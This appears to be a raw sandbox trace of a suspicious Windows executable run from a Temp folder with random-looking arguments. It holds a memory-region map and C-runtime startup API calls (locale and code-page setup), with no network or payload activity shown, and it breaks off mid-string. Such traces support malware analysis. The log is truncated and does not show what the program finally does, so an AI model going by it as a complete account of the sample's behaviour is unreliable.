"\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe") Region: id = 4741 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4742 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4743 start_va = 0x7ffb0000 end_va = 
0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4744 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 4745 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 4746 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4747 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4748 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 4749 start_va = 0x5e0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 4750 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4751 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 4752 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4753 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id 
= 4754 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4755 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 4756 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4757 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 4758 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 4759 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4760 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4802 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4803 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 4804 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 4805 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000005f0000" filename = "" Region: id = 4806 start_va = 0x11f0000 end_va = 0x12dffff entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 4906 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4907 start_va = 0x12e0000 end_va = 0x146ffff entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 5009 start_va = 0x11f0000 end_va = 0x12cefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Region: id = 5010 start_va = 0x12d0000 end_va = 0x12dffff entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 5011 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 5012 start_va = 0x1c0000 end_va = 0x1c2fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5013 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Thread: id = 49 os_tid = 0xca8 [0107.767] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x7e3d6b00, dwHighDateTime=0x1d440a9)) [0107.767] GetCurrentProcessId () returned 0xca4 [0107.767] GetCurrentThreadId () returned 0xca8 [0107.767] GetTickCount () returned 0x25c90 [0107.767] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=16455591682) returned 1 [0107.767] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", 
lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0107.767] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0107.768] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0107.768] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0107.768] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0107.768] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0107.768] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0107.769] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0107.769] GetCurrentThreadId () returned 0xca8 [0107.769] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x12d07d0)) [0107.769] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0107.769] GetFileType (hFile=0x3) returned 0x0 [0107.770] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0107.770] GetFileType (hFile=0x7) returned 0x0 [0107.770] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0107.770] GetFileType (hFile=0xb) returned 0x0 
[0107.770] SetHandleCount (uNumber=0x20) returned 0x20 [0107.770] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0107.770] GetEnvironmentStringsW () returned 0x22fce8* [0107.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1033 [0107.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x12d11f8, cbMultiByte=1033, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\EEBsYm5\\Desktop", lpUsedDefaultChar=0x0) returned 1033 [0107.770] FreeEnvironmentStringsW (penv=0x22fce8) returned 1 [0107.770] GetLastError () returned 0x6 [0107.770] SetLastError (dwErrCode=0x6) [0107.770] GetLastError () returned 0x6 [0107.770] SetLastError (dwErrCode=0x6) [0107.770] GetLastError () returned 0x6 [0107.770] SetLastError (dwErrCode=0x6) [0107.770] GetACP () returned 0x4e4 [0107.770] GetLastError () returned 0x6 [0107.770] SetLastError (dwErrCode=0x6) [0107.770] IsValidCodePage (CodePage=0x4e4) returned 1 [0107.770] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0107.770] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0107.770] GetLastError () returned 0x6 [0107.770] SetLastError (dwErrCode=0x6) [0107.770] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0107.771] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: 
lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0107.771] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0107.771] GetLastError () returned 0x6 [0107.771] SetLastError (dwErrCode=0x6) [0107.771] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0107.771] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ湙ꯃശAĀ") returned 256 [0107.771] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 
!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ湙ꯃശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0107.771] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ湙ꯃശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0107.771] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef
\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xdc\xb7\x3a\xaa\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0107.771] GetLastError () returned 0x6 [0107.771] SetLastError (dwErrCode=0x6) [0107.771] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0107.771] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ湙ꯃശAĀ") returned 256 [0107.771] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ湙ꯃശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0107.771] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ湙ꯃശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0107.771] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x0
